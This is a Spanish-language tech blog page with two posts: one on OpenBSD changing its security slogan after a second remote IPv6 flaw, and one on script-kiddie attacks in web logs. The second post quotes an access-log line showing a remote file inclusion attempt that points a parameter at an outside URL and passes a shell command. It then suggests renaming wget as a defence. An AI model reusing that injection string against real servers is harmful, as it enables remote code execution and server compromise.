Gentegeek es un Blog que recoje un puñado de anotaciones más o menos tecnológicas.
Internet, gadgets, Software libre, programación y en general cualquier tema que pueda resultar interesante para un geek tiene cabida en este weblog.

Acerca de...PublicidadArchivo
Mis sitios webBlogrollOtros |
SeguridadOpenBSD: Sólo 2 fallos de seguridad remotos en más de 10 añosOpenBSD ha tenido que cambiar recientemente el slogan que lucía orgullosamente hasta ahora, "Sólo 1 fallo de seguridad remoto en más de 10 años". Para quien no conozca la historia, OpenBSD es un sistema operativo libre basado en BSD, es conocido en el mundillo como el sistema operativo más seguro y estable que existe, ya que en la instalación por defecto incorpora todas las medidas de seguridad existentes y los servicios que abre al exterior son muy reducidos. De ahí el slogan anteriormente comentado. Pero recientemente se ha descubierto una nueva vulneabilidad en la pila IPv6, con lo que el slogan ha tenido que ser cambiado a "Sólo 2 fallos de seguridad remotos en más de 10 años". Ahún así, este SO sigue siendo el más seguro y estable que podemos encontrar actualmente. Más información en Hispasec Por suil el 24/03/2007 - 14:25 | Seguridad | añadir nuevo comentario
Problemas de seguridad relacionados con wgetCualquiera que tenga un servidor web y revise los logs de acceso podrá comprobar el gran número de ataques con scripts kiddies que se producen a lo largo del día. Intentos de ataque como éste son el pan de cada día para los sysadmin: XXX.XXX.XXX.XXX - - [10/Jan/2005:23:09:31 -0600] "GET index.php?template=http://geocities.com/s3xmelayu/bc-x.gif?&cmd=cd%20/tmp; Si usas mod_security para apache la mayoría de estos ataques se quedan en meros intentos, pero no dejan de ser molestos. Mi compañero CrK01, de NewLight Systems, encontró por fin una solución tan simple como efectiva, basta con renombrar en nuestro sistema el binario "wget" a "baja" y el 80% de estos ataques fracasarán. DISCLAIMER: Al cambiar el nombre de wget, todos los programas o scripts que hagan uso de éste dejarán de funcionar. No me hago responsable de los posibles fallos que este cambio pueda ocasionar. A mi compañero le funciona sin problemas pero cada sistema es un mundo :) |